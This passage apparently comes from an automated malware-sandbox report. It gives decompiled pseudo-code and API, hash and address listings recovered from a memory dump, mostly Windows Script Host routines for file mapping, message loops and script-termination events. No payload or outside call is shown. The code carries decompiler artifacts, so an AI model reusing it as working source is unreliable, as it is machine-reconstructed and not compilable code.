                                                        				 *__ecx = _t8;
                                                        				_t10 = GetFileSize(_t8, 0);
                                                        				_t25[3] = _t10;
                                                        				if(_t10 == 0xffffffff) {
                                                        					_t11 = GetLastError();
                                                        					if(_t11 > 0) {
                                                        						_t11 = _t11 & 0x0000ffff | 0x80070000;
                                                        					}
                                                        					L9:
                                                        					return _t11;
                                                        				}
                                                        				if(_t10 == 0) {
                                                        					_t11 = 0;
                                                        					goto L9;
                                                        				}
                                                        				_t17 = _a8;
                                                        				_t13 = CreateFileMappingA( *_t25, 0, _t17, 0, _t10, 0);
                                                        				_t25[1] = _t13;
                                                        				if(_t13 == 0) {
                                                        					L18:
                                                        					_t11 = GetLastError();
                                                        					if(_t11 > 0) {
                                                        						_t11 = _t11 & 0x0000ffff | 0x80070000;
                                                        					}
                                                        					L8:
                                                        					goto L9;
                                                        				}
                                                        				_t20 = 2;
                                                        				if(_t17 != _t20) {
                                                        					if(_t17 != 4) {
                                                        						_t20 = 0 | _t17 == 0x00000008;
                                                        					}
                                                        				} else {
                                                        					_t20 = 4;
                                                        				}
                                                        				_t15 = MapViewOfFile(_t13, _t20, 0, 0, 0);
                                                        				_t25[2] = _t15;
                                                        				if(_t15 == 0) {
                                                        					goto L18;
                                                        				} else {
                                                        					_t11 = 0;
                                                        					goto L8;
                                                        				}
                                                        			}

                                                        APIs
                                                        • GetFileSize.KERNEL32(?,00000000,00000000,?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B856DC
                                                        • CreateFileMappingA.KERNEL32 ref: 00B85701
                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B85721
                                                        • GetLastError.KERNEL32(?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B8997B
                                                        • GetLastError.KERNEL32(?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B899AC
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: File$ErrorLast$CreateMappingSizeView
                                                        • String ID:
                                                        • API String ID: 981448092-0
                                                        • Opcode ID: 7a3f8a287aa81368f6f940d2215983b9ea55644ece7e9c29a96ed91a5086e031
                                                        • Instruction ID: 56479ca4e606a7d6b0bd6d81a2e18dedeaea31629ac491bd9c959111b262ab9f
                                                        • Opcode Fuzzy Hash: 7a3f8a287aa81368f6f940d2215983b9ea55644ece7e9c29a96ed91a5086e031
                                                        • Instruction Fuzzy Hash: 3D11967A211641EEDB347A658C8CD777BECD7C5731B788A6DF116C60B0E5258C40C720
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 27%
                                                        			E00B8D256(long long* _a4, char* _a8, int _a12, char _a16, intOrPtr _a20, signed char _a24) {
                                                        				signed int _v8;
                                                        				char _v39;
                                                        				char _v40;
                                                        				long long* _v44;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t33;
                                                        				intOrPtr* _t39;
                                                        				void* _t40;
                                                        				int _t41;
                                                        				int _t42;
                                                        				void* _t45;
                                                        				intOrPtr _t46;
                                                        				char _t47;
                                                        				void* _t52;
                                                        				char* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        				char* _t56;
                                                        				void* _t57;
                                                        				signed int _t58;
                                                        				void* _t59;
                                                        				long long* _t60;
                                                        
                                                        				_t33 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t33 ^ _t58;
                                                        				_v44 = _a4;
                                                        				_t53 = _a8;
                                                        				if((_a24 & 1) != 0) {
                                                        					_a16 = _a16 - 0x20;
                                                        				}
                                                        				_v40 = 0x25;
                                                        				if((_a24 & 0x00000080) != 0) {
                                                        					_push(2);
                                                        					_v39 = 0x23;
                                                        					_pop(1);
                                                        				}
                                                        				 *((char*)(_t58 + 0xffffffffffffffdd)) = 0x2e;
                                                        				__imp___itoa(_a20, _t58 + 0xffffffffffffffde, 0xa, _t54);
                                                        				_t39 =  &_v40;
                                                        				_t60 = _t59 + 0xc;
                                                        				_t21 = _t39 + 1; // 0x2f
                                                        				_t55 = _t21;
                                                        				do {
                                                        					_t46 =  *_t39;
                                                        					_t39 = _t39 + 1;
                                                        				} while (_t46 != 0);
                                                        				_t47 = _a16;
                                                        				_t40 = _t39 - _t55;
                                                        				 *((char*)(_t58 + _t40 - 0x24)) = _t47;
                                                        				 *((char*)(_t58 + _t40 - 0x23)) = 0;
                                                        				_t41 = _a12;
                                                        				_t56 =  &(_t53[_t41 - 1]);
                                                        				 *_t56 = 0;
                                                        				 *_t60 =  *_v44;
                                                        				_t42 = _snprintf(_t53, _t41,  &_v40, _t47, _t47);
                                                        				_pop(_t57);
                                                        				if( *_t56 != 0 || _t42 <= 0) {
                                                        					_push(0x16);
                                                        					 *_t53 = 0;
                                                        					_pop(0);
                                                        				}
                                                        				return E00B81335(0, _t45, _v8 ^ _t58, _t52, _t53, _t57);
                                                        			}

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: _itoa_snprintf
                                                        • String ID: $#$.
                                                        • API String ID: 3295663647-1065809056
                                                        • Opcode ID: 95dfa785b582297fd035d3d0a7fb096a8d5ae7067868e228ceb31d9a4a9f4b45
                                                        • Instruction ID: a94705a2da39714b0b7f49c6e3d402ff36a59d15326346639a0929f50b62b4eb
                                                        • Opcode Fuzzy Hash: 95dfa785b582297fd035d3d0a7fb096a8d5ae7067868e228ceb31d9a4a9f4b45
                                                        • Instruction Fuzzy Hash: 8721CF3050428A9BDB11DF6CDA48BEE7FE4EF0A304F240499EC80E72D1DA719A16C7A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 67%
                                                        			E00B86476(void* __edx, signed int _a4, intOrPtr* _a8) {
                                                        				signed int _v8;
                                                        				void* _v12;
                                                        				void* _v16;
                                                        				void* _v20;
                                                        				signed int _v24;
                                                        				void* _v28;
                                                        				char* _v32;
                                                        				char _v36;
                                                        				signed int _v40;
                                                        				signed int _v44;
                                                        				signed int _v48;
                                                        				void* _v52;
                                                        				long _v56;
                                                        				intOrPtr _v72;
                                                        				signed int _v76;
                                                        				intOrPtr _v80;
                                                        				char _v84;
                                                        				signed int _t71;
                                                        				intOrPtr* _t79;
                                                        				intOrPtr* _t83;
                                                        				intOrPtr* _t85;
                                                        				signed int _t86;
                                                        				signed int _t89;
                                                        				signed int _t94;
                                                        				intOrPtr _t97;
                                                        				void* _t102;
                                                        				long _t107;
                                                        				void* _t127;
                                                        				intOrPtr* _t128;
                                                        				signed int _t130;
                                                        				signed int _t132;
                                                        				intOrPtr* _t134;
                                                        				void* _t136;
                                                        
                                                        				 *0xFFFFFFFF49167890 =  *((intOrPtr*)(0xffffffff49167890)) + __edx;
                                                        				_t128 = _a8;
                                                        				_v16 = 0;
                                                        				_v20 = 0;
                                                        				_v8 = 0;
                                                        				_t71 =  *((intOrPtr*)( *_t128 + 0xc))(_t128,  &_v84, _t127, _t102, _t136);
                                                        				if(_t71 < 0) {
                                                        					L9:
                                                        					return _t71;
                                                        				} else {
                                                        					_t132 = _a4;
                                                        					if(E00B86529( *((intOrPtr*)(_t132 + 0x2c))) == 0) {
                                                        						_t71 = 0x80004005;
                                                        						L8:
                                                        						goto L9;
                                                        					}
                                                        					_t107 = _v56;
                                                        					if(_t107 == 0x8004fffc) {
                                                        						__eflags =  *(_t132 + 0x51);
                                                        						if( *(_t132 + 0x51) == 0) {
                                                        							 *(_t132 + 0x51) = 1;
                                                        							_t130 = E00B90A12(_t132);
                                                        							__eflags = _t130;
                                                        							if(_t130 < 0) {
                                                        								L6:
                                                        								_t134 = __imp__#6;
                                                        								 *_t134(_v80);
                                                        								 *_t134(_v76);
                                                        								 *_t134(_v72);
                                                        								 *_t134(_v8);
                                                        								 *_t134(_v20);
                                                        								_t79 = _v16;
                                                        								if(_t79 != 0) {
                                                        									 *((intOrPtr*)( *_t79 + 8))(_t79);
                                                        								}
                                                        								_t71 = _t130;
                                                        								goto L8;
                                                        							}
                                                        							_t130 = E00B90A52(_t132, 0,  &_v16);
                                                        							__eflags = _t130;
                                                        							if(_t130 < 0) {
                                                        								goto L6;
                                                        							}
                                                        							_t83 = _v16;
                                                        							_v28 = 0;
                                                        							_v32 = L"WScript_OnScriptTerminate";
                                                        							_t130 =  *((intOrPtr*)( *_t83 + 0x14))(_t83, 0xb81804,  &_v32, 1, 0x400,  &_v28);
                                                        							__eflags = _t130;
                                                        							if(_t130 < 0) {
                                                        								__eflags = _t130 - 0x80020006;
                                                        								if(_t130 == 0x80020006) {
                                                        									L5:
                                                        									_t130 = 0;
                                                        									goto L6;
                                                        								}
                                                        								goto L6;
                                                        							}
                                                        							_t85 = _v16;
                                                        							_v52 = 0;
                                                        							_v48 = 0;
                                                        							_v44 = 0;
                                                        							_v40 = 0;
                                                        							_t86 =  *((intOrPtr*)( *_t85 + 0x18))(_t85, _v28, 0xb81804, 0x400, 1,  &_v52, 0, 0, 0);
                                                        							_t130 = _t86;
                                                        							__eflags = _t130;
                                                        							if(_t130 >= 0) {
                                                        								goto L5;
                                                        							}
                                                        							goto L6;
                                                        						}
                                                        						goto L5;
                                                        					}
                                                        					if(_t107 != 0x8004fffd) {
                                                        						__eflags = _t107 - 0x8004fffe;
                                                        						if(_t107 == 0x8004fffe) {
                                                        							_t130 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x2c)))) + 0x20))();
                                                        							goto L6;
                                                        						}
                                                        						_t89 = _v76;
                                                        						_a4 = _t89;
                                                        						__eflags = _t89;
                                                        						if(_t89 == 0) {
                                                        							L20:
                                                        							_t130 = E00B8F3F0(_t107,  &_v20);
                                                        							__eflags = _t130;
                                                        							if(_t130 < 0) {
                                                        								goto L6;
                                                        							}
                                                        							_t128 = _a8;
                                                        							_a4 = _v20;
                                                        							L22:
                                                        							_t94 =  *((intOrPtr*)( *_t128 + 0x10))(_t128,  &_v36,  &_v12,  &_v24);
                                                        							__eflags = _t94;
                                                        							if(_t94 < 0) {
                                                        								_t31 =  &_v24;
                                                        								 *_t31 = _v24 | 0xffffffff;
                                                        								__eflags =  *_t31;
                                                        								_v12 = 0;
                                                        							} else {
                                                        								 *((intOrPtr*)( *_t128 + 0x14))(_t128,  &_v8);
                                                        							}
                                                        							__eflags = _v8;
                                                        							if(__eflags == 0) {
                                                        								_v8 = E00B9220B( *((intOrPtr*)(_t132 + 0x40)), __eflags, _v12);
                                                        							}
                                                        							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x2c)))) + 0x14))(_v12, _v24 + 1, _v80, _a4, _v8, _v56, 0);
                                                        							_t97 =  *((intOrPtr*)(_t132 + 0x2c));
                                                        							__eflags =  *(_t97 + 0x23);
                                                        							if( *(_t97 + 0x23) != 0) {
                                                        								E00B90ADF(_t132, _t128,  *((intOrPtr*)(_t132 + 0x40)), _v12);
                                                        							}
                                                        							goto L5;
                                                        						}
                                                        						__eflags =  *_t89;
                                                        						if( *_t89 != 0) {
                                                        							goto L22;
                                                        						}
                                                        						goto L20;
                                                        					}
                                                        					goto L5;
                                                        				}
                                                        			}

                                                        APIs
                                                          • Part of subcall function 00B86529: InterlockedExchange.KERNEL32(?,00000000), ref: 00B8652F
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864DD
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E2
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E7
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864EC
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864F1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FreeString$ExchangeInterlocked
                                                        • String ID:
                                                        • API String ID: 4071441547-0
                                                        • Opcode ID: 7b32818e90e1b19f14332af923f46aecd068e3dcd93d62bc02b403918961d02c
                                                        • Instruction ID: 68dcd3565b8bffcea0d6fac8d206d6bbef64d2fc8d11c23a737a98bd28f3754d
                                                        • Opcode Fuzzy Hash: 7b32818e90e1b19f14332af923f46aecd068e3dcd93d62bc02b403918961d02c
                                                        • Instruction Fuzzy Hash: 24016171D0011DABCB20AF9ACC848AEBFBAEF90364B64456AE415A3270DB70AD05CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B824CF(void* _a4, int _a8, long _a12, long _a16) {
                                                        				struct tagMSG _v32;
                                                        				long _t13;
                                                        
                                                        				_t13 = MsgWaitForMultipleObjects(1,  &_a4, _a8, _a12, _a16);
                                                        				if(_t13 != 0xffffffff) {
                                                        					while(_t13 == 1) {
                                                        						while(PeekMessageA( &_v32, 0, 0, 0, 1) != 0) {
                                                        							TranslateMessage( &_v32);
                                                        							DispatchMessageA( &_v32);
                                                        						}
                                                        						_t13 = MsgWaitForMultipleObjects(1,  &_a4, _a8, _a12, _a16);
                                                        						if(_t13 != 0xffffffff) {
                                                        							continue;
                                                        						}
                                                        						goto L3;
                                                        					}
                                                        				}
                                                        				L3:
                                                        				return _t13;
                                                        			}






                                                        APIs
                                                        • MsgWaitForMultipleObjects.USER32 ref: 00B824EE
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00B8846C
                                                        • MsgWaitForMultipleObjects.USER32 ref: 00B88481
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: MultipleObjectsWait$MessagePeek
                                                        • String ID:
                                                        • API String ID: 653132895-0
                                                        • Opcode ID: aa62ee27ac784c66f35d475bcade56eafcc9c2d897ff0ff4d1f4e233f81dda76
                                                        • Instruction ID: f6c155900eeeb104e5d93f84bf87b7ba4286599459b4fa8a2953fa08e9c26d3b
                                                        • Opcode Fuzzy Hash: aa62ee27ac784c66f35d475bcade56eafcc9c2d897ff0ff4d1f4e233f81dda76
                                                        • Instruction Fuzzy Hash: 97012C7250014EBBDF01AFA4DC44DEF3BADEB44310F044511FA15D60A1DA71D952DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864DD
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E2
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864E7
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864EC
                                                        • SysFreeString.OLEAUT32(?), ref: 00B864F1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FreeString
                                                        • String ID:
                                                        • API String ID: 3341692771-0
                                                        • Opcode ID: f576f9a88844a195d077d62014e66c3300830aa6c092ba082de27da7f5dea6b6
                                                        • Instruction ID: d9a4bd619c712481c84d948fb47064ef1f4f99a5d711a8d7c3d7ad3acf325bb8
                                                        • Opcode Fuzzy Hash: f576f9a88844a195d077d62014e66c3300830aa6c092ba082de27da7f5dea6b6
                                                        • Instruction Fuzzy Hash: 75E0BF36E000289BCF117B9ADC4589EBFB2EF903A576544B7D115A3270DA325D26DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 77%
                                                        			E00B82299(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                        				signed int _v8;
                                                        				char _v12;
                                                        				char _v272;
                                                        				intOrPtr _v280;
                                                        				intOrPtr _v284;
                                                        				intOrPtr _v288;
                                                        				char _v289;
                                                        				char _v290;
                                                        				char _v291;
                                                        				intOrPtr _v292;
                                                        				intOrPtr _v296;
                                                        				intOrPtr _v300;
                                                        				char _v820;
                                                        				intOrPtr _v824;
                                                        				char _v825;
                                                        				char _v826;
                                                        				char _v827;
                                                        				char _v829;
                                                        				int _v831;
                                                        				char _v842;
                                                        				char _v844;
                                                        				char _v848;
                                                        				intOrPtr _v1372;
                                                        				char _v1396;
                                                        				intOrPtr _v1400;
                                                        				WCHAR* _v1404;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t93;
                                                        				intOrPtr* _t100;
                                                        				void* _t110;
                                                        				intOrPtr _t111;
                                                        				int _t112;
                                                        				void* _t118;
                                                        				char _t124;
                                                        				void* _t129;
                                                        				intOrPtr _t130;
                                                        				int _t131;
                                                        				void* _t132;
                                                        				int _t134;
                                                        				intOrPtr _t137;
                                                        				intOrPtr _t145;
                                                        				int _t146;
                                                        				intOrPtr _t150;
                                                        				void* _t158;
                                                        				int _t160;
                                                        				intOrPtr* _t167;
                                                        				intOrPtr* _t193;
                                                        				signed int _t195;
                                                        				void* _t196;
                                                        
                                                        				_t190 = __edx;
                                                        				_t158 = __ebx;
                                                        				_t93 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t93 ^ _t195;
                                                        				_t193 = __ecx;
                                                        				_v1400 = _a16;
                                                        				E00B8437C( &_v848, __eflags);
                                                        				_a8 = _a8 - 1;
                                                        				_t192 = _a12 + 4;
                                                        				_v1404 = _a12 + 4;
                                                        				if(E00B837F5() == 0) {
                                                        					E00B85D17(_t97,  &_v848);
                                                        					_t100 = 1;
                                                        					goto L27;
                                                        				} else {
                                                        					_t9 = _t193 + 0x260; // 0xb8246c
                                                        					_t192 = _t9;
                                                        					if(E00B8461D(_t97, _t9) >= 0) {
                                                        						E00B839B0( *_t192);
                                                        					}
                                                        					_push(_t158);
                                                        					if( *0xb97001 == 0) {
                                                        						_v12 = 0;
                                                        						_t104 = GetModuleFileNameA( *0xb9701c,  &_v272, 0x105);
                                                        						__eflags = _t104;
                                                        						if(_t104 == 0) {
                                                        							L29:
                                                        							E00B85D17(_t104,  &_v848);
                                                        							_t100 = 1;
                                                        							L26:
                                                        							_pop(_t158);
                                                        							L27:
                                                        							return E00B81335(_t100, _t158, _v8 ^ _t195, _t190, _t192, _t193);
                                                        						}
                                                        						__eflags = _v12;
                                                        						if(_v12 != 0) {
                                                        							goto L29;
                                                        						}
                                                        						_t58 = _t193 + 0x2c; // 0xb82238
                                                        						_t192 = _t58;
                                                        						_t160 = 0;
                                                        						_t104 = MultiByteToWideChar(0, 0,  &_v272, 0xffffffff, _t58, 0x105);
                                                        						__eflags = _t104;
                                                        						if(_t104 == 0) {
                                                        							goto L29;
                                                        						}
                                                        						L7:
                                                        						_t13 = _t193 + 0x10; // 0xb8221c
                                                        						_t14 = _t193 + 0xc; // 0xb82218
                                                        						_t110 = E00B8442A(_t192, _t14, _t13);
                                                        						_t206 = _t110 - _t160;
                                                        						_t167 = _t193;
                                                        						if(_t110 < _t160) {
                                                        							_push(_t110);
                                                        							_push(0xc80);
                                                        							L35:
                                                        							_t111 =  *0xb9702c; // 0x0
                                                        							_t190 =  *_t193;
                                                        							_t112 = _t111 + 0x14;
                                                        							__eflags = _t112;
                                                        							_t113 =  *((intOrPtr*)( *_t193))(_t112);
                                                        							L36:
                                                        							_t193 = 1;
                                                        							L25:
                                                        							E00B85D17(_t113,  &_v848);
                                                        							_t100 = _t193;
                                                        							goto L26;
                                                        						}
                                                        						E00B83FF7(_t167, _t206);
                                                        						_t207 = _a8 - _t160;
                                                        						if(_a8 == _t160) {
                                                        							_t193 =  *((intOrPtr*)( *_t193 + 0x1c))();
                                                        							goto L25;
                                                        						}
                                                        						E00B83732( &_v848, _a8, _v1404);
                                                        						_t118 = E00B83D3E( &_v848, _t207, 0x80000002);
                                                        						_t208 = _t118 - _t160;
                                                        						if(_t118 < _t160) {
                                                        							L38:
                                                        							_push(_t118);
                                                        							_push(0xc85);
                                                        							L39:
                                                        							goto L35;
                                                        						}
                                                        						_t192 = 0x80000001;
                                                        						_t118 = E00B83D3E( &_v848, _t208, 0x80000001);
                                                        						if(_t118 < _t160) {
                                                        							goto L38;
                                                        						}
                                                        						 *(_t193 + 0x20) = _v831;
                                                        						_t113 = E00B83C66( &_v848, _t190, 0x80000001);
                                                        						if(_t113 < _t160) {
                                                        							__eflags = _t113 - 0x8004ffff;
                                                        							if(_t113 == 0x8004ffff) {
                                                        								goto L36;
                                                        							}
                                                        							_push(_t113);
                                                        							_push(0xc87);
                                                        							goto L39;
                                                        						}
                                                        						 *(_t193 + 0x20) = _v831;
                                                        						 *((intOrPtr*)(_t193 + 8)) = _v848;
                                                        						 *((char*)(_t193 + 0x21)) = _v844;
                                                        						 *((char*)(_t193 + 0x23)) = _v829;
                                                        						_t124 = _v827;
                                                        						 *((char*)(_t193 + 0x24)) = _t124;
                                                        						 *((char*)(_t193 + 0x25)) = _v825;
                                                        						if(_t124 != 0) {
                                                        							__eflags = _v826;
                                                        							if(__eflags != 0) {
                                                        								 *((char*)(_t193 + 0x23)) = 1;
                                                        							}
                                                        						}
                                                        						_t36 = _t193 + 0x27; // 0xb8cd0700
                                                        						_t113 =  *_t36;
                                                        						if(_t113 != 0) {
                                                        							 *(_t193 + 0x20) = 1;
                                                        						}
                                                        						if(_v290 != 0) {
                                                        							__eflags = _t113;
                                                        							if(_t113 == 0) {
                                                        								 *(_t193 + 0x20) = _t113;
                                                        								__eflags = _v842 - _t113;
                                                        								if(_v842 != _t113) {
                                                        									 *((intOrPtr*)( *_t193 + 8))();
                                                        								}
                                                        								_t113 =  *((intOrPtr*)( *_t193 + 0xc))();
                                                        							}
                                                        							goto L49;
                                                        						} else {
                                                        							if(_v842 != 0) {
                                                        								 *((intOrPtr*)( *_t193 + 8))();
                                                        							}
                                                        							if(_v291 != 0) {
                                                        								E00B843C9( &_v1396);
                                                        								_t129 = E00B8F066( &_v1396, _t190, __eflags, _t192);
                                                        								__eflags = _t129 - _t160;
                                                        								if(_t129 < _t160) {
                                                        									L52:
                                                        									_push(0xc83);
                                                        									L53:
                                                        									_t130 =  *0xb9702c; // 0x0
                                                        									_t131 = _t130 + 0x14;
                                                        									__eflags = _t131;
                                                        									L54:
                                                        									_push(_t131);
                                                        									_t113 = E00B8F342(_t193);
                                                        									goto L36;
                                                        								}
                                                        								_t132 = E00B8FA22(_t160, _t192, _t193, _v1372);
                                                        								__eflags = _t132 - _t160;
                                                        								if(_t132 >= _t160) {
                                                        									_t113 =  *((intOrPtr*)( *_t193 + 0x10))(_t193, _t160, 0xbea);
                                                        									L49:
                                                        									_t193 = 0;
                                                        									goto L25;
                                                        								}
                                                        								goto L52;
                                                        							}
                                                        							_t113 = 0;
                                                        							if(_v292 != 0) {
                                                        								_t134 = E00B8F066( &_v848, _t190, __eflags, _t192);
                                                        								__eflags = _t134;
                                                        								if(_t134 < 0) {
                                                        									goto L52;
                                                        								}
                                                        								 *((intOrPtr*)( *_t193 + 0x10))(_t193, _t160, 0xbeb);
                                                        								_t196 = _t196 + 0xc;
                                                        								_t113 = 1;
                                                        							}
                                                        							if(_v289 != 0) {
                                                        								_t113 = E00B8FA22(_t160, _t192, _t193, _v824);
                                                        								__eflags = _t113;
                                                        								if(_t113 >= 0) {
                                                        									__eflags = _v300 - _t160;
                                                        									if(_v300 != _t160) {
                                                        										L66:
                                                        										_t113 = 1;
                                                        										goto L20;
                                                        									}
                                                        									__eflags = _v824 - 0x43;
                                                        									if(_v824 == 0x43) {
                                                        										_push(0xbed);
                                                        										L65:
                                                        										 *((intOrPtr*)( *_t193 + 0x10))(_t193, _t160);
                                                        										goto L66;
                                                        									}
                                                        									__eflags = _v824 - 0x57;
                                                        									if(_v824 != 0x57) {
                                                        										goto L36;
                                                        									}
                                                        									_push(0xbec);
                                                        									goto L65;
                                                        								}
                                                        								_push(0xc82);
                                                        								goto L53;
                                                        							}
                                                        							L20:
                                                        							_t182 = _v300;
                                                        							if(_v300 == _t160) {
                                                        								__eflags = _t113;
                                                        								if(_t113 != 0) {
                                                        									goto L49;
                                                        								}
                                                        								L68:
                                                        								_t137 =  *0xb9702c; // 0x0
                                                        								_push(0xce8);
                                                        								_t131 = _t137 + 0x15;
                                                        								goto L54;
                                                        							}
                                                        							if(_v820 == _t160) {
                                                        								goto L68;
                                                        							}
                                                        							if(_v280 != _t160) {
                                                        								_t192 = 0;
                                                        								__eflags = _v280 - _t160;
                                                        								if(_v280 <= _t160) {
                                                        									L24:
                                                        									_t50 = _t193 + 0x1c; // 0xb8cb0e
                                                        									_t193 =  *_t50;
                                                        									goto L25;
                                                        								} else {
                                                        									goto L74;
                                                        								}
                                                        								while(1) {
                                                        									L74:
                                                        									_t113 = E00B81F26(_t193, _t190,  &_v820, _v300 - 1, _v296 + 4, _v288,  *((intOrPtr*)(_v284 + _t192 * 4)), _v1400);
                                                        									__eflags = _t113 - _t160;
                                                        									if(_t113 < _t160) {
                                                        										__eflags =  *((char*)(_t193 + 0x22));
                                                        										if( *((char*)(_t193 + 0x22)) == 0) {
                                                        											 *((intOrPtr*)(_t193 + 0x1c)) = 1;
                                                        										}
                                                        										__eflags = _t113 - 0x8004ffff;
                                                        										if(_t113 != 0x8004ffff) {
                                                        											_t190 =  *_t193;
                                                        											_t145 =  *0xb9702c; // 0x0
                                                        											_t146 = _t145 + 0x14;
                                                        											__eflags = _t146;
                                                        											_t113 =  *((intOrPtr*)( *_t193))(_t146, 0xc87, _t113);
                                                        										}
                                                        									}
                                                        									_t192 =  &(_t192[0]);
                                                        									__eflags = _t192 - _v280;
                                                        									if(_t192 >= _v280) {
                                                        										goto L24;
                                                        									}
                                                        								}
                                                        								goto L24;
                                                        							}
                                                        							_t113 = E00B81F26(_t193, _t190,  &_v820, _t182 - 1, _v296 + 4, _v288, _t160, _v1400);
                                                        							if(_t113 < _t160) {
                                                        								__eflags =  *((char*)(_t193 + 0x22));
                                                        								if( *((char*)(_t193 + 0x22)) == 0) {
                                                        									 *((intOrPtr*)(_t193 + 0x1c)) = 1;
                                                        								}
                                                        								__eflags = _t113 - 0x8004ffff;
                                                        								if(_t113 != 0x8004ffff) {
                                                        									_t190 =  *_t193;
                                                        									_t150 =  *0xb9702c; // 0x0
                                                        									_t113 =  *((intOrPtr*)( *_t193))(_t150 + 0x14, 0xc87, _t113);
                                                        								}
                                                        							}
                                                        							goto L24;
                                                        						}
                                                        					}
                                                        					_t10 = _t193 + 0x2c; // 0xb82238
                                                        					_t192 = _t10;
                                                        					 *((short*)(_t193 + 0x234)) = 0;
                                                        					if(GetModuleFileNameW( *0xb9701c, _t10, 0x105) == 0) {
                                                        						goto L29;
                                                        					}
                                                        					_t104 = 0;
                                                        					_t12 = _t193 + 0x234; // 0x5c60850f
                                                        					if(0 !=  *_t12) {
                                                        						goto L29;
                                                        					} else {
                                                        						_t160 = 0;
                                                        						goto L7;
                                                        					}
                                                        				}
                                                        			}

                                                        0x00b8804a
                                                        0x00000000
                                                        0x00b8804a
                                                        0x00000000
                                                        0x00b88079
                                                        0x00b82438
                                                        0x00b82440
                                                        0x00b880ad
                                                        0x00b880b2
                                                        0x00b880b4
                                                        0x00000000
                                                        0x00000000
                                                        0x00b880bf
                                                        0x00b880c2
                                                        0x00b880c5
                                                        0x00b880c5
                                                        0x00b8244d
                                                        0x00b880d2
                                                        0x00b880d7
                                                        0x00b880d9
                                                        0x00b880e2
                                                        0x00b880e8
                                                        0x00b88116
                                                        0x00b88116
                                                        0x00000000
                                                        0x00b88116
                                                        0x00b880ea
                                                        0x00b880f1
                                                        0x00b88107
                                                        0x00b8810c
                                                        0x00b88110
                                                        0x00000000
                                                        0x00b88113
                                                        0x00b880f3
                                                        0x00b880fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88100
                                                        0x00000000
                                                        0x00b88100
                                                        0x00b880db
                                                        0x00000000
                                                        0x00b880db
                                                        0x00b82453
                                                        0x00b82453
                                                        0x00b8245b
                                                        0x00b8811d
                                                        0x00b8811f
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88125
                                                        0x00b88125
                                                        0x00b8812a
                                                        0x00b8812f
                                                        0x00000000
                                                        0x00b8812f
                                                        0x00b82468
                                                        0x00000000
                                                        0x00000000
                                                        0x00b82474
                                                        0x00b88169
                                                        0x00b8816b
                                                        0x00b88171
                                                        0x00b824a9
                                                        0x00b824a9
                                                        0x00b824a9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88177
                                                        0x00b88177
                                                        0x00b881a8
                                                        0x00b881ad
                                                        0x00b881af
                                                        0x00b881b1
                                                        0x00b881b5
                                                        0x00b881b7
                                                        0x00b881b7
                                                        0x00b881be
                                                        0x00b881c3
                                                        0x00b881c5
                                                        0x00b881c8
                                                        0x00b881d2
                                                        0x00b881d2
                                                        0x00b881d8
                                                        0x00b881d8
                                                        0x00b881c3
                                                        0x00b881da
                                                        0x00b881db
                                                        0x00b881e1
                                                        0x00000000
                                                        0x00000000
                                                        0x00b881e7
                                                        0x00000000
                                                        0x00b88177
                                                        0x00b8249c
                                                        0x00b824a3
                                                        0x00b88137
                                                        0x00b8813b
                                                        0x00b8813d
                                                        0x00b8813d
                                                        0x00b88144
                                                        0x00b88149
                                                        0x00b8814f
                                                        0x00b88152
                                                        0x00b88162
                                                        0x00b88162
                                                        0x00b88149
                                                        0x00000000
                                                        0x00b824a3
                                                        0x00b82415
                                                        0x00b8230e
                                                        0x00b8230e
                                                        0x00b82312
                                                        0x00b82327
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8232d
                                                        0x00b8232f
                                                        0x00b82336
                                                        0x00000000
                                                        0x00b8233c
